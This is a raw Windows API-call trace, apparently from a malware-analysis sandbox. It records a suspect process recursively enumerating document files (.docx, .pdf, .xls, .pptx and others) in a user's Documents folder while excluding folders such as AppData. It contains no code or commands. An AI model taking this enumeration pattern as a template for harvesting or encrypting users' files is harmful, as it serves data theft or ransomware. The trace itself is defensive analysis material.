[0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.914] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xe06b1270, ftLastWriteTime.dwHighDateTime=0x1d5e32b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 1 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0x189ff370, ftLastWriteTime.dwHighDateTime=0x1d5ac29, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x10, dwReserved1=0x657690, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 1 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc61770, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xac00e9c0, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0xac00e9c0, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="KwBYebiNhHcjLML", cAlternateFileName="KWBYEB~1")) returned 1 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.915] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML", cchCount1=15, lpString2="AppData", cchCount2=7) returned 3 [0073.915] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.915] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.915] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.915] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc61770, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xac00e9c0, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0xac00e9c0, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0073.917] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc61770, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xac00e9c0, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0xac00e9c0, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0073.917] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xb4ebf4e0, ftLastWriteTime.dwHighDateTime=0x1d5debf, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 1 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.917] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xd1d81f90, ftLastWriteTime.dwHighDateTime=0x1d5d846, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 1 [0073.917] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xfda093c0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 1 [0073.917] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x786873d0, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 1 [0073.917] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x363ae3c0, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x10, dwReserved1=0x657690, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x817489c0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x10, dwReserved1=0x657690, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x8494bac0, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0x40a7d2d0, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0x31badc20, ftLastWriteTime.dwHighDateTime=0x1d5e09b, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x10, dwReserved1=0x657690, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0x2ad3e090, ftLastWriteTime.dwHighDateTime=0x1d5dc0a, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x10, dwReserved1=0x657690, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x179d67e0, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce344270, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 1 [0073.959] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x12c0069, ftCreationTime.dwLowDateTime=0xc2aa2, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0xee006a, nFileSizeHigh=0xc2aa2, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ZA\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0073.959] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b738 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3f0 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b420 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b480 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0073.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3a8 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b408 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3d8 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.961] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0x1307fcf0, ftLastWriteTime.dwHighDateTime=0x1d56638, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 1 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 